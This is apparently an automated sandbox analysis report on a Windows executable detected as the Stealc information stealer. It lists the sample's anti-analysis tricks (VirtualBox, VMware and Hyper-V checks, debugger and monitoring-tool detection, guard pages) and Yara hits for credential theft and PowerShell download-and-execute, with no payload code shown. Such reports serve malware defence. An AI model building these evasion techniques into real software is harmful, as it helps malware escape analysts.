Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1389080982.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware+

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E44A60 VirtualProtect 00000000,00000004,00000100,?

1_2_00E44A60

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00E66390

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E66390 mov eax, dword ptr fs:[00000030h]

1_2_00E66390

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

1_2_00E62AD0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,		1_2_00E646A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E64610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,		1_2_00E64610

Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: G[Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

1_2_00E62D60

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

1_2_00E62B60

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

1_2_00E62A40

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_00E62C10

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1562132
Product:	CloudBasic
Start time:	08:43:10
Start date:	25.11.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	195eafa20236c52b744d7ff88ccf8dd6
SHA1:	eb079dc207806442f57ef816f42f8b0a1835aa46
SHA256:	110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by